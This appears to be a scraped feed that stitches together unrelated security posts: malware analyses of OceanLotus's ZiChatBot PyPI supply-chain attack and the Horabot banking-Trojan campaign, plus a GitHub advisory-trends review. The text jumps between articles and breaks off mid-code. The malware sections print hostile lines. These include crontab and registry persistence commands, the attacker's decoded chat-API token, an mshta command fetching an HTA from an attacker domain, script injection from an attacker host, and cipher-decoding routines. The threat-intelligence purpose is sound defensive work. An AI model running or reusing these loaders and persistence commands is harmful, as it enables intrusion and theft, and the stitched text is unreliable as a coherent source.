OceanLotus Hijacks PyPI to Deploy “ZiChatBot” via Enterprise Chat APIs

The post OceanLotus Hijacks PyPI to Deploy “ZiChatBot” via Enterprise Chat APIs appeared first on Daily CyberSecurity.

Through our daily threat hunting, we noticed that, beginning in July 2025, a series of malicious wheel packages were uploaded to PyPI (the Python Package Index). We shared this information with the public security community, and the malware was removed from the repository. We submitted the samples to Kaspersky Threat Attribution Engine (KTAE) for analysis. Based on the results, we believe the packages may be linked to malware discussed in a Threat Intelligence report on OceanLotus.

While these wheel packages do implement the features described on their PyPI web pages, their true purpose is to covertly deliver malicious files. These files can be either .DLL or .SO (Linux shared library), indicating the packages’ ability to target both Windows and Linux platforms. They function as droppers, delivering the final payload – a previously unknown malware family that we have named ZiChatBot. Unlike traditional malware, ZiChatBot does not communicate with a dedicated command and control (C2) server, but instead uses a series of REST APIs from the public team chat app Zulip as its C2 infrastructure.

To conceal the malicious package containing ZiChatBot, the attacker created another benign-looking package that included the malicious package as a dependency. Based on these facts, we confirm that this campaign is a carefully planned and executed PyPI supply chain attack.

The attacker created three projects on PyPI and uploaded malicious wheel packages designed to imitate popular libraries, tricking users into downloading them. This is a clear example of a supply chain attack via PyPI. See below for detailed information about the fake libraries and their corresponding wheel packages.

The packages added by the attacker and listed on PyPI’s download pages are:

- uuid32-utils: library for generating a 32-character random string as a UUID
- colorinal: library for implementing cross-platform color terminal text
- termncolor: library for ANSI color format for terminal output

The key metadata for these packages are as follows:

| Pip install command | File name | First upload date | Author / Email |
|---|---|---|---|
| pip install uuid32-utils | uuid32_utils-1.x.x-py3-none-[OS platform].whl | 2025-07-16 | laz**** / laz****@tutamail.com |
| pip install colorinal | colorinal-0.1.7-py3-none-[OS platform].whl | 2025-07-22 | sym**** / sym****@proton.me |
| pip install termncolor | termncolor-3.1.0-py3-none-any.whl | 2025-07-22 | sym**** / sym****@proton.me |

Based on the distribution information on the PyPI web pages, the packages are offered in x86 and x64 versions for Windows, as well as an x86_64 version for Linux. The colorinal project, for example, provides the following download options:

The uuid32-utils and colorinal libraries employ similar infection chains and malicious payloads. As a result, this analysis will focus on the colorinal library as a representative example.

A quick look at the code of the third library, termncolor, reveals no apparent malicious content. However, it imports the malicious colorinal library as a dependency. This method allows attackers to deeply conceal malware, making the termncolor library appear harmless when distributing it or luring targets.

During the initial infection stage, the Python code is nearly identical across both Windows and Linux platforms. Here, we analyze the Windows version as an example.

Once a Python user downloads and installs the colorinal-0.1.7-py3-none-win_amd64.whl wheel package file, or installs it using the pip tool, the ZiChatBot’s dropper (a file named terminate.dll) will be extracted from the wheel package and placed on the victim’s hard drive.

After that, if the colorinal library is imported into the victim’s project, the Python script file at [Python library installation path]\colorinal-0.1.7-py3-none-win_amd64\colorinal\__init__.py will be executed first.

This Python script imports and executes another script located at [python library install path]\colorinal-0.1.7-py3-none-win_amd64\colorinal\unicode.py. The is_color_supported() function in unicode.py is called immediately.

The comment in the is_color_supported() function states that the highlighted code checks whether the user’s terminal environment supports color. The code actually loads the terminate.dll file into the Python process and then invokes the DLL’s exported function envir, passing the UTF-8-encoded string xterminalunicode as a parameter. The DLL acts as a dropper, delivering the final payload, ZiChatBot, and then self-deleting. At the end of the is_color_supported() function, the unicode.py script file is also removed. These steps eliminate all malicious files in the library and deploy ZiChatBot.

For the Linux platform, the wheel package and the unicode.py Python script are nearly identical to the Windows version. The only difference is that the dropper file is named “terminate.so”.

From the previous analysis, we learned that the dropper is loaded into the host Python process by a Python script and then activated. The main logic of the dropper is implemented in the envir export function, which achieves three objectives: deploying ZiChatBot, establishing persistence for it, and removing the dropper itself.

The dropper first decrypts sensitive strings using AES in CBC mode. The key is the string parameter “xterminalunicode” passed to the exported function. The decrypted strings are “libcef.dll”, “vcpacket”, “pkt-update”, and “vcpktsvr.exe”.

Next, the malware uses the same algorithm to decrypt the embedded data related to ZiChatBot. It then decompresses the decrypted data with LZMA to retrieve the files vcpktsvr.exe and libcef.dll associated with ZiChatBot. The malware creates a folder named vcpacket in the system directory %LOCALAPPDATA%, and places these files into it.

To establish persistence for ZiChatBot, the dropper creates the following auto-run entry in the registry:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "pkt-update"="C:\Users\[User name]\AppData\Local\vcpacket\vcpktsvr.exe"

Once preparations are complete, the malware uses the XOR algorithm to decrypt the embedded shellcode with the three-byte key 3a7. It then searches the decrypted shellcode’s memory for the string Policy.dllcppage.dll and replaces it with its own file name, terminate.dll, and redirects execution to the shellcode’s memory space.
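The XOR step and the placeholder patch described above can be sketched in Python. This is a minimal illustration rather than the dropper's actual code: it assumes the key 3a7 is used as the three ASCII bytes `b"3a7"` repeated over the buffer, and it assumes the replacement name is null-padded to the placeholder's length. The function names `xor_decrypt` and `patch_placeholder` are hypothetical, and the buffer is a stand-in, not real shellcode.

```python
from itertools import cycle


def xor_decrypt(data: bytes, key: bytes = b"3a7") -> bytes:
    """Apply a repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def patch_placeholder(buf: bytes, placeholder: bytes, new_name: bytes) -> bytes:
    """Overwrite the placeholder with new_name, null-padded so offsets stay stable."""
    if len(new_name) > len(placeholder):
        raise ValueError("replacement is longer than the placeholder")
    padded = new_name.ljust(len(placeholder), b"\x00")
    return buf.replace(placeholder, padded, 1)


if __name__ == "__main__":
    # Stand-in buffer containing only the placeholder string from the text
    plain = b"\x90\x90Policy.dllcppage.dll\x00\xc3"
    encrypted = xor_decrypt(plain)        # simulate the embedded XOR-ed blob
    decrypted = xor_decrypt(encrypted)    # recover it with the same key
    print(patch_placeholder(decrypted, b"Policy.dllcppage.dll", b"terminate.dll"))
```

Because XOR is its own inverse, the same helper can be used to re-encrypt a patched buffer when building test fixtures for detection rules.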

The shellcode uses a djb2-like hash to identify the names of the APIs it needs and locate their addresses. Using these APIs, it finds the dropper file by the name terminate.dll, which the DLL passed in earlier, then unloads and deletes it.
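For readers unfamiliar with hash-based API resolution, the sketch below shows the general idea with the classic djb2 function (seed 5381, multiplier 33) truncated to 32 bits. The text only says the hash is "djb2-like", so the exact constants in the sample may differ. The helper `resolve_by_hash` and the API names in the example are illustrative assumptions, not values taken from the shellcode.

```python
def djb2(name: bytes) -> int:
    """Classic djb2: h = h * 33 + byte, starting from 5381, kept to 32 bits."""
    h = 5381
    for byte in name:
        h = (h * 33 + byte) & 0xFFFFFFFF
    return h


def resolve_by_hash(export_names, wanted_hash):
    """Return the first export whose hash matches, mimicking hash-based lookup."""
    for name in export_names:
        if djb2(name.encode("ascii")) == wanted_hash:
            return name
    return None


if __name__ == "__main__":
    # Illustrative export list; shellcode would walk a module's export table
    exports = ["CreateFileW", "DeleteFileW", "FreeLibrary"]
    target = djb2(b"DeleteFileW")  # shellcode would embed only this number
    print(hex(target), resolve_by_hash(exports, target))
```

Precomputing such hashes for common API names is a practical way to annotate the constants found in a disassembly, once the sample's actual hash variant has been confirmed.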

The Linux version of the dropper places ZiChatBot in the path /tmp/obsHub/obs-check-update and then creates an auto-run job using crontab. Unlike the Windows version, the Linux version of ZiChatBot only consists of one ELF executable file.

system("chmod +x /tmp/obsHub/obs-check-update")

system("echo \"5 * * * * /tmp/obsHub/obs-check-update\" | crontab -")

The Windows version of ZiChatBot is a DLL file (libcef.dll) that is loaded by the legitimate executable vcpktsvr.exe (hash: 48be833b0b0ca1ad3cf99c66dc89c3f4). The DLL contains several export functions, with the malicious code implemented in the cef_api_mash export. Once the DLL is loaded, this function is invoked by the EXE file. ZiChatBot uses the REST APIs from Zulip, a public team chat application, as its command and control server.

ZiChatBot is capable of executing shellcode received from the server and only supports this one control command. Once it runs, it initiates a series of sequential HTTP requests to the Zulip REST API.

In each HTTP request, an API authentication token is included as an HTTP header for server-side authentication, as shown below.

// Auth token: TW9yaWFuLWJvdEBoZWxwZXIuenVsaXBjaGF0LmNvbTpVOFJFWGxJNktmOHFYQjlyUXpPUEJpSUE0YnJKNThxRw==

// Decoded auth token: Morian-bot@helper.zulipchat.com:U8REXlI6Kf8qXB9rQzOPBiIA4brJ58qG
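The token is plain Base64 over an `identity:secret` pair, the same shape as an HTTP Basic authentication credential. A short Python sketch reproduces the decoding shown above. The function name `decode_basic_token` is hypothetical, and splitting on the first colon is an assumption about how the two parts are delimited.

```python
import base64

TOKEN = (
    "TW9yaWFuLWJvdEBoZWxwZXIuenVsaXBjaGF0LmNvbTpVOFJFWGxJ"
    "NktmOHFYQjlyUXpPUEJpSUE0YnJKNThxRw=="
)


def decode_basic_token(token: str) -> tuple[str, str]:
    """Decode a Base64 'identity:secret' pair into its two parts."""
    decoded = base64.b64decode(token).decode("utf-8")
    identity, _, secret = decoded.partition(":")
    return identity, secret


if __name__ == "__main__":
    identity, secret = decode_basic_token(TOKEN)
    print(identity)  # bot account address
    print(secret)    # API key portion
```

The same helper can be pointed at tokens pulled from proxy logs or memory dumps to recover which chat organization a sample talks to.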

ZiChatBot utilizes two separate channel-topic pairs for its operations. One pair transmits current system information, and the other retrieves a message containing shellcode. Once the shellcode is received, a new thread is created to execute it. After executing the command, a heart emoji is sent in response to the original message to indicate the execution was successful.

We did not find any traditional infrastructure, such as compromised servers or commercial VPS services and their associated IPs and domains. Instead, the malicious wheel packages were uploaded to the Python Package Index (PyPI), a public, shared Python library. The malware, ZiChatBot, leverages Zulip’s public team chat REST APIs as its command and control server.

The “helper” organization that the attacker had registered on the Zulip service has now been officially deactivated by Zulip. However, infected devices may still attempt to connect to the service, so to help you locate and remediate them, we recommend adding the domain helper.zulipchat.com to your denylist.

The malware was uploaded in July 2025. Upon discovering these attacks, we quickly released an update for our product to detect the relevant files and shared the necessary information with the public security community. As a result, the malicious software was swiftly removed from PyPI, and the organization registered on the Zulip service was officially deactivated. To date, we have not observed any infections based on our telemetry or public reports.

Based on the results from our KTAE system, the dropper used by ZiChatBot shows a 64% similarity to another dropper we analyzed in a TI report, which was linked to OceanLotus. Reverse engineering shows that both droppers use nearly identical algorithms and logic to decrypt and decompress their embedded payloads.

As an active APT organization, OceanLotus primarily targets victims in the Asia-Pacific region. However, our previous reports have highlighted a growing trend of the group expanding its activities into the Middle East. Moreover, the attacks described in this report – executed through PyPI – target Python users worldwide. This demonstrates OceanLotus’s ongoing effort to broaden its attack scope.

In the first half of 2025, a public report revealed that the group launched a phishing campaign using GitHub. The recent PyPI-based supply chain attack likely continues this strategy. Although phishing emails are still a common initial infection method for OceanLotus, the group is also actively exploring new ways to compromise victims through diverse supply chain attacks.

Additional information about this activity, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. If you are interested, please contact intelreports@kaspersky.com.

Malicious wheel packages

termncolor-3.1.0-py3-none-any.whl

5152410aeef667ffaf42d40746af4d84

uuid32_utils-1.x.x-py3-none-xxxx.whl

0a5a06fa2e74a57fd5ed8e85f04a483a

e4a0ad38fd18a0e11199d1c52751908b

5598baa59c716590d8841c6312d8349e

968782b4feb4236858e3253f77ecf4b0

b55b6e364be44f27e3fecdce5ad69eca

02f4701559fc40067e69bb426776a54f

e200f2f6a2120286f9056743bc94a49d

22538214a3c917ff3b13a9e2035ca521

colorinal-0.1.7-py3-none-xxxx.whl

ba2f1868f2af9e191ebf47a5fab5cbab

Dropper for ZiChatBot

Backward.dll

c33782c94c29dd268a42cbe03542bca5

454b85dc32dc8023cd2be04e4501f16a

Backward.so

fce65c540d8186d9506e2f84c38a57c4

652f4da6c467838957de19eed40d39da

terminate.dll

1995682d600e329b7833003a01609252

terminate.so

38b75af6cbdb60127decd59140d10640

ZiChatBot

libcef.dll

a26019b68ef060e593b8651262cbd0f6

See what you missed in Daily Tech Insider from March 30–April 3.

The post AI Breakthroughs, Security Breaches, and Industry Shakeups Define the Week in Tech appeared first on TechRepublic.



GitHub published 4,101 reviewed advisories in 2025. This is the fewest number of reviewed advisories since 2021. Does this mean open source is shipping more secure code? Let’s dig into the data to find out.

Fewer advisories reviewed doesn’t mean fewer vulnerabilities were reported. The drop is because GitHub reviewed far fewer older vulnerabilities. When you look only at newly reported vulnerabilities from our sources, GitHub actually reviewed 19% more advisories year over year.

So why the change? Quite frankly, we are running out of unreviewed vulnerabilities that are older than the Advisory Database. At the same time, the number of newly reported vulnerabilities hasn’t dropped.

It’s also worth clarifying that “unreviewed” in the database can be misleading: most advisories marked unreviewed have already been looked at by a curator and found not to affect any package in a supported ecosystem, so they may never be fully reviewed.

This means that you should be receiving fewer brand-new Dependabot alerts about old vulnerabilities.

Note: If you find an unreviewed advisory that affects a supported package, please let us know so we can get it reviewed!

The distribution of ecosystems in advisories reviewed in 2025 is similar to the overall distribution in the database, with the exception of Go. Go is overrepresented in 2025 advisories by 6%. This is largely due to dedicated campaigns to re-examine potentially missing advisories found through an internal review for packages where we had inconsistent coverage.

| Rank | Common Weakness Enumeration (CWE) | Number of 2025 Advisories* | Change in Rank from 2024 | Change in Rank from the Overall Database |
|---|---|---|---|---|
| 1 | CWE-79 | 672 | +0 | +0 |
| 2 | CWE-22 | 214 | +2 | +1 |
| 3 | CWE-863 | 169 | +9 | +8 |
| 4 | CWE-20 | 154 | +1 | +1 |
| 5 | CWE-200 | 145 | -2 | -1 |
| 6 | CWE-400 | 144 | +4 | +0 |
| 7 | CWE-770 | 136 | +7 | +10 |
| 8 | CWE-502 | 134 | +5 | +1 |
| 9 | CWE-94 | 119 | -3 | -1 |
| 10 | CWE-918 | 103 | +5 | +8 |

* An advisory may have more than one CWE. For example, an advisory might have both CWE-400 and CWE-770. It would then count for both.
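The counting rule in the footnote means the per-CWE totals can add up to more than the number of advisories. A minimal sketch of that tally follows. The advisory records are made-up placeholders, and `count_cwes` is a hypothetical helper, not part of any GitHub tooling.

```python
from collections import Counter

# Hypothetical advisories; the IDs and CWE lists are invented for illustration
advisories = [
    {"id": "EXAMPLE-1", "cwes": ["CWE-400", "CWE-770"]},
    {"id": "EXAMPLE-2", "cwes": ["CWE-79"]},
    {"id": "EXAMPLE-3", "cwes": ["CWE-20", "CWE-79"]},
]


def count_cwes(items):
    """Count each advisory once for every distinct CWE it lists."""
    counts = Counter()
    for advisory in items:
        counts.update(set(advisory["cwes"]))
    return counts


cwe_counts = count_cwes(advisories)
print(cwe_counts.most_common())
```

Here three advisories produce five CWE counts, which is why the column totals in a table like the one above should not be read as a count of advisories.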

As usual, cross-site scripting (CWE-79) is by far the most common vulnerability type. However, there are significant changes in the following areas. Resource exhaustion (CWE-400 and CWE-770), unsafe deserialization (CWE-502), and server-side request forgery (CWE-918) were unusually common in 2025. CWE-863 (“Incorrect Authorization”) saw a significant jump, but that is largely due to reclassification away from CWE-284 (“Improper Access Control”) and CWE-285 (“Improper Authorization”), which are higher level CWEs that the CWE program discourages using.

One of the biggest quality improvements in 2025 was more specific, more consistent CWE tagging. Advisories without any CWE dropped 85% (from 452 in 2024 to 65 in 2025). CWE-20 (“Improper Input Validation”) is still common, but in prior years it was often the only CWE listed on an advisory.

In 2025, advisories far more often list CWE-20 plus one or more additional CWEs that describe the concrete failure mode. This added specificity makes the data more actionable for triage, prioritization, and remediation.

To find out how to filter Dependabot alerts by CWE, see our documentation on auto-triage rules.

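We provide two scoring systems for prioritization: CVSS (the Common Vulnerability Scoring System), which rates the severity of a vulnerability, and EPSS (the Exploit Prediction Scoring System), which estimates the likelihood that it will be exploited.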

Together, they can give you a head start on your risk assessment process.

When considering impact, most vulnerabilities skew toward the moderate-to-high end of the impact range. Low-impact vulnerabilities are likely more common than the CVSS data suggests but are often not considered worth the time and effort for researchers and maintainers to report. The EPSS scores for moderate to high impact vulnerabilities support this decision.

So should you trust the EPSS or CVSS scores? To judge that, let’s look at how they match up to vulnerabilities in CISA’s Known Exploited Vulnerabilities Catalog. The exploited vulnerabilities are at least scored moderate, and most are critical or high. While CVSS has more of the exploited vulnerabilities as critical, it also has far more vulnerabilities in the range in general. Combining the two can help you prioritize which vulnerabilities to address to prevent exploitation.

2025 was a huge year for npm malware advisories. Due to large malware campaigns, such as SHA1-Hulud, GitHub saw a 69% increase in published malware advisories compared to 2024. This is the most malware advisories GitHub has published since our initial release of historical malware when we added support in 2022.

You can receive Dependabot alerts when your repositories depend on npm packages with known malicious versions. When you enable malware alerting, Dependabot matches your npm dependencies against malware advisories in the GitHub Advisory Database.

2025 was a big year for the GitHub, Inc. CNA. We saw a 35% increase in published CVE records, outpacing the overall CVE Project’s increase of 21%.

In fact, we saw 10 to 16% growth every quarter. If this trend continues, GitHub will publish over 50% more CVEs in 2026.
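As a rough check on that projection, quarterly growth can be compounded over four quarters. The sketch below assumes growth compounds quarter over quarter and compares one quarter with the same quarter a year later, which simplifies how annual totals actually accumulate. The helper `compounded_growth` is hypothetical.

```python
def compounded_growth(quarterly_rate: float, quarters: int = 4) -> float:
    """Return total growth after compounding a per-quarter rate."""
    return (1 + quarterly_rate) ** quarters - 1


for rate in (0.10, 0.13, 0.16):
    total = compounded_growth(rate)
    print(f"{rate:.0%} per quarter -> {total:.1%} over four quarters")
```

Under these assumptions, sustained growth in the middle or upper part of the 10 to 16% range compounds to more than 50% over a year.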

You can help make that a reality by requesting a CVE from us the next time you publish a repository security advisory about a vulnerability!

Every year, GitHub sees more organizations use its CNA services. 2025 is no exception with a 20% increase in new organizations requesting CVE IDs.

Unlike reviewed global advisories, which are always mapped to packages in ecosystems we support, any maintainer on GitHub can request a CVE, even if they don’t publish that package to a supported ecosystem. In fact, 2025 is the first year that GitHub has published more CVEs from organizations that do not use a supported ecosystem than those that do.

We would like to thank all 987 organizations that published CVEs with us in 2025 and highlight the top 10 most prolific organizations.

Top 10 organizations using the GitHub CNA

| Organization | Number of 2025 CVEs |
|---|---|
| LabReDeS (WeGIA)* | 130 |
| XWiki | 40 |
| Frappe | 28 |
| Discourse | 27 |
| Enalean | 27 |
| FreeScout* | 27 |
| DataEase | 26 |
| Nextcloud | 25 |
| GLPI | 24 |
| DNN Software* | 23 |

* Organizations that published CVEs through GitHub for the first time in 2025

The data from 2025 shows incredible growth:

These numbers represent real security improvements for millions of developers.

You can be part of this in 2026. Here’s how:

Publishing CVEs shouldn’t be complicated. Request a CVE directly from your repository security advisory, and we’ll take care of curating and publishing it for you. It’s free, it’s fast, and it helps the entire ecosystem understand and respond to vulnerabilities.

Found an unreviewed advisory affecting a supported package? See incorrect severity scores or missing affected versions? Suggest edits. Your edits will be reviewed by the Advisory Database team and, ultimately, will help make the database more accurate for everyone. In 2025, 675 contributions from the community improved the quality of this data for the entire software industry!

The most direct impact you can have is protecting your own code. Enable Dependabot to automatically receive security updates and explore GitHub Advanced Security for comprehensive protection.

Let researchers know how to report to you and what you will and will not accept by creating a security policy for your repository. Enable private vulnerability reporting to make the coordination process smooth and secure.

Let’s make 2026 even better. See you in next year’s review! 🚀

The post A year of open source vulnerability trends: CVEs, advisories, and malware appeared first on The GitHub Blog.

In this installment of our SOC Files series, we will walk you through a targeted campaign that our MDR team identified and hunted down a few months ago. It involves a threat known as Horabot, a bundle consisting of an infamous banking Trojan, an email spreader, and a notably complex attack chain.

Although previous research has documented Horabot campaigns, our goal is to highlight how active this threat remains and to share some aspects not covered in those analyses.

As usual, our story begins with an alert that popped up in one of our customers’ environments. The rule that triggered it is generic yet effective at detecting suspicious mshta activity. The case progressed from that initial alert, but fortunately ended on a positive note. Kaspersky Endpoint Security intervened, terminated the malicious process via its proactive defense module (PDM), and removed the related files before the threat could progress any further.

The incident was then brought up for discussion at one of our weekly meetings. That was enough to spark the curiosity of one of our analysts, who then delved deeper into the tradecraft behind this campaign.

After some research and a lot of poking around in the adversary infrastructure, our team managed to map out the end-to-end kill chain. In this section, we will break down each stage and explain how the operation unfolds.

Following the breadcrumbs observed in the reported incident, the activity appears to begin with a standard fake CAPTCHA page. In the incident mentioned above, this page was located at the URL https://evs.grupotuis[.]buzz/0capcha17/.

Similar to the Lumma and Amadey cases, this page instructs the user to open the Run dialog, paste a malicious command into it and then run it. Once deceived, the victim pastes a command similar to the one below:

mshta https://evs.grupotuis[.]buzz/0capcha17/DMEENLIGGB.hta

This command retrieved and executed an HTA file that contained the following:

It is essentially a small loader. When executed, it opens a blank window, then immediately pulls and runs an external JavaScript payload hosted on the attacker’s domain. The body contains a large block of random, meaningless text that serves purely as filler.

The payload loaded by the HTA file dynamically creates a new <script> element, sets its source to an external VBScript hosted on another attacker-controlled domain, and injects it into the <head> section of a page hardcoded in the HTA. You can see the full content of the page in the box below. Once appended, the external VBScript is immediately fetched and executed, advancing the attack to its next stage.

var scriptEle = document.createElement("script");

scriptEle.setAttribute("src", "https://pdj.gruposhac[.]lat/g1/ld1/");

scriptEle.setAttribute("type", "text/vbscript");

document.getElementsByTagName('head')[0].appendChild(scriptEle);

The next-stage VBS content resembles the example shown below. During our analysis, we observed the use of server-side polymorphism because each access to the same resource returned a slightly different version of the code while preserving the same functionality.

The script is obfuscated and employs a custom string encoding routine. Below is a more readable version with its strings decoded and replaced using a small Python script that replicates the decode_str() routine.

The script performs pretty much the same function as the initial HTA file. It reaches a JavaScript loader that injects and executes another polymorphic VBScript.

var scriptEle = document.createElement("script");

scriptEle.setAttribute("src", "https://pdj.gruposhac[.]lat/g1/");

scriptEle.setAttribute("type", "text/vbscript");

document.getElementsByTagName('head')[0].appendChild(scriptEle);

Unlike the first script, this one is significantly more complex, with more than 400 lines of code. It acts as the heavy lifter of the operation. Below is a brief summary of its key characteristics:

C:\Users\Public\LAPTOP-0QF0NEUP4.

During our analysis of the heavy lifter, specifically within the exfiltration routine, we identified where the collected data was being sent. After probing the associated URL and removing the “salvar.php” portion, we uncovered an exposed webpage where the adversary listed all their victims.

As you may have noticed, the table is in Brazilian Portuguese and lists victims dating back to May 2025 (this screenshot was taken in September 2025). In the “Localização” (location) column, the adversary even included the victims’ geographic coordinates, which are redacted in the screenshot. A quick breakdown shows that, of the 5384 victims, 5030 were located in Mexico, representing roughly 93% of the total.

It is now time to focus on the files downloaded by our heavy lifter. As previously mentioned, three AutoIt components were dropped on disk: the executable (AutoIt3), the compiler (Aut2Exe), and the script (au3), along with an encrypted blob file. Since we have access to the AutoIt script code, we can analyze its routines. However, it contains over 750 lines of heavily obfuscated code, so let’s focus only on what really matters.

The most important routine is responsible for decrypting the blob file (it uses AES-192 with a key derived from the seed value 99521487), loading it directly into memory, and then calling the exported function B080723_N. The decrypted blob is a DLL.

We also managed to replicate the decryption logic with a Python script and manually extract the DLL (0x6272EF6AC1DE8FB4BDD4A760BE7BA5ED). After initial triage and basic sandbox execution, we observed the following:

Once loaded into memory, the Trojan sends several HTTP requests to different URLs:

| URL | Description |
|---|---|
| https://cgf.facturastbs[.]shop/0725/a/home (GET) | A page containing an encrypted configuration |
| https://cfg.brasilinst[.]site/a/br/logs/index.php?CHLG (POST) | A URL for posting host information, but in our lab tests the value was empty. Request content example: Host: ‘ ‘ |
| https://aufal.filevexcasv[.]buzz/on7/index15.php (POST) https://aufal.filevexcasv[.]buzz/on7all/index15.php (POST) | A URL used to post victim information. Request content example: AT: ‘ Microsoft Windows 10 Pro FLARE-VM (64)bit REMFLARE-VM’ MD: 040825VS |
| https://cgf.facturastbs[.]shop/a/08/150822/au/at.html | HTML lure page designed to trick the user into accessing a malicious link whose contents are also used as a PDF attachment during the email distribution phase. |
| https://upstar.pics/a/08/150822/up/up (GET) | The resource was already unavailable at the time our testing was conducted. |
| https://cgf.midasx.site/a/08/150822/au/au (GET) | The page containing the first stage leading to the spreader. |

Since this malware family has been extensively documented in previous studies, we won’t reiterate its well-known functionality. Instead, we’ll focus on lesser-documented and newly observed features, including the malware’s encryption and protocol handling logic.

The sample implements a stateful XOR-subtraction cipher in the sub_00A86B64 subroutine, which is used to protect strings and decrypt HTTP data received from the C2. Unlike simple XOR, each byte of output here depends on both the key and the previous byte. In our sample, the key is the string "0xFF0wx8066h".

We can easily reimplement the logic of the routine in Python and integrate the following snippet into our workflow to automate string decryption:

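    def decrypt_string(encrypted_hex):
        """Decrypt a hex string protected by the stateful XOR-subtraction cipher."""
        key_string = "0xFF0wx8066h"
        key_index = 0
        result = ""

        # The first byte is the initial state and carries no plaintext
        current_key = int(encrypted_hex[0:2], 16)
        i = 2
        while i < len(encrypted_hex):
            next_key = int(encrypted_hex[i:i+2], 16)

            # Wrap around when the key string is exhausted
            if key_index >= len(key_string):
                key_index = 0
            key_char = ord(key_string[key_index])

            xored_value = next_key ^ key_char
            # Subtract the previous ciphertext byte, wrapping by 0xFF on underflow
            if xored_value > current_key:
                decrypted_char = xored_value - current_key
            else:
                decrypted_char = (xored_value + 0xFF) - current_key
            result += chr(decrypted_char)

            # The current ciphertext byte becomes the state for the next byte
            current_key = next_key
            key_index += 1
            i += 2
        return result

Python implementation of the decryption routine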
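When automating string decryption, it helps to have an encoder for building test vectors. The sketch below is a hypothetical inverse derived from the decryption logic above, not a routine recovered from the sample. The name `encrypt_string`, the default seed byte, and the uppercase hex output are assumptions, and it expects characters in the range 1 to 255.

```python
def encrypt_string(plaintext: str, seed: int = 0x20,
                   key_string: str = "0xFF0wx8066h") -> str:
    """Hypothetical inverse of decrypt_string(): hex output, seed byte first."""
    out = [seed]
    prev = seed
    for index, ch in enumerate(plaintext):
        key_char = ord(key_string[index % len(key_string)])
        value = ord(ch) + prev
        if value > 0xFF:
            value -= 0xFF            # mirrors the "+ 0xFF" branch of the decoder
        cipher_byte = value ^ key_char
        out.append(cipher_byte)
        prev = cipher_byte           # the ciphertext byte feeds the next step
    return "".join(f"{b:02X}" for b in out)


if __name__ == "__main__":
    print(encrypt_string("A", seed=0x10))
```

Round-tripping known strings through this encoder and the decryption routine is a quick way to confirm that a reimplementation handles both the plain and the wrap-around branch.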

The encrypted strings are retrieved in three different ways: through indexed lookups using a global encrypted Delphi string list (also observed by our colleagues at ESET); via direct references to encrypted hex strings in the data section; and through indirect references using pointer variables, which adds overhead when automating decryption with scripts.

The malware fetches its configuration by sending an HTTPS GET request to the C2 server, whose address is hardcoded in encrypted form. The server returns the configuration in the raw HTTP response as a list of values, each individually encrypted with the aforementioned algorithm. The sample extracts specific parameters based on their position in the list.

To improve readability, the above screenshot has been edited to include the decrypted parameters, which are separated by double newlines.

Configuration retrieval and parsing are initiated in the sub_00AD2C70 subroutine where the first configuration value, the C2 socket connection setting (host;port), is extracted.

If parsing fails, the malware falls back to a hardcoded secondary C2 socket address. The socket connection is then established.

Additional configuration values are parsed in sub_00AD2918 and its subroutines. For example, in the decrypted C2 configuration shown above, parameter 5 contains the “UPON” string that triggers execution, and parameter 6 contains the PowerShell commands that are run when this string is used. Below is the portion of the routine that takes care of parsing this command:

In addition to HTTP communication, the malware supports raw socket communication using a custom protocol that encapsulates commands into tags such as <|SIMPLE_TAG|> or <|TAG|>Arg1<|>Arg2<<|>.

The client initiates the C2 connection in sub_00AD331C, where it establishes a TCP socket to the operator’s server and sends the "PRINCIPAL" command to request a control channel. After receiving an OK response, it follows up with an "Info" message containing system details. Once validated, the server replies with a "SocketMain" message containing a session ID, completing the handshake. All subsequent command handling occurs in sub_00AD373C, a central orchestrator routine that parses incoming messages and dispatches the malicious actions.

The sample, and therefore the protocol itself, is inherited from the open-source Delphi Remote Access PC project, as our colleagues at ESET have noted in the past. Below is a visual comparison:

Comparison of “PING” and “Close” commands (sample disassembly on the left, Delphi Remote Access source code on the right)

Some features from the open-source project, including the chat and file manipulation commands, have been removed, while some mouse-related commands have been renamed with playful prefixes like “LULUZ” (e.g., LULUZLD, LULUZPos). This could be an inside joke, anti-analysis obfuscation, or a way to mark custom variants. Beyond the standard functionality, the protocol now includes a range of additional custom commands, such as LULUZSD for mouse wheel scrolling down, ENTERMANDA to simulate pressing the Enter key, and COLADIFKEYBOARD to inject arbitrary text as keystrokes.

The full command set is considerably larger, and while not all commands are implemented in the analyzed sample, evidence of their presence (e.g., in the form of strings) suggests ongoing development.

After getting a sense of the protocol, let’s focus on the cipher used. In this sample, traffic exchanged via the C2 socket channel is encrypted using another stateful XOR algorithm with embedded decryption keys. Its logic is implemented in the routines sub_00A9F2D0 (encryption) and sub_00A9F5C0 (decryption):

The encryption routine generates three random four-digit integer keys. The first key acts as the initial cipher state, while the other two serve as the multiplier and increment that are applied at every encryption stage to both the state and the data. For each character in the input string, it takes the high byte of the current state, XORs it with the character to encrypt, and then updates the cipher state for the next character. The output is created by prepending the three keys to the ciphertext, encapsulating everything within the “##” markers. The final output looks like this:

##[key1][key2][key3][encrypted_hex_data]##
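The sender side of this scheme can be sketched as follows, for example to generate test traffic for a detection rule. This is an illustration built from the description above. It assumes the state is kept to 16 bits and updated with the ciphertext byte (mirroring the decoding snippet in this section), that the keys are drawn from 1000 to 9999, and that text is encoded as Latin-1. The name `obfuscate_traffic` is hypothetical.

```python
import random


def obfuscate_traffic(plaintext: str, keys=None) -> str:
    """Sketch of the sender: '##' + three 4-digit keys + hex ciphertext + '##'."""
    if keys is None:
        keys = tuple(random.randint(1000, 9999) for _ in range(3))
    key1, key2, key3 = keys
    state = key1
    hex_parts = []
    for byte in plaintext.encode("latin-1"):
        cipher_byte = byte ^ ((state >> 8) & 0xFF)  # XOR with high byte of state
        hex_parts.append(f"{cipher_byte:02X}")
        # Assumed update rule: multiplier key2, increment key3, 16-bit state
        state = ((state + cipher_byte) * key2 + key3) & 0xFFFF
    return f"##{key1:04d}{key2:04d}{key3:04d}{''.join(hex_parts)}##"


if __name__ == "__main__":
    print(obfuscate_traffic("PRINCIPAL"))
```

Passing fixed `keys` makes the output deterministic, which is convenient for unit tests. Leaving them unset mimics the per-message random keys described in the text.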

Here’s a Python snippet to decode such traffic:

    def deobfuscate_traffic(obfuscated):
        # Messages are wrapped in "##" markers.
        if not (obfuscated.startswith("##") and obfuscated.endswith("##")):
            raise ValueError("Invalid format")
        core = obfuscated[2:-2]
        # Three four-digit decimal keys precede the hex-encoded ciphertext.
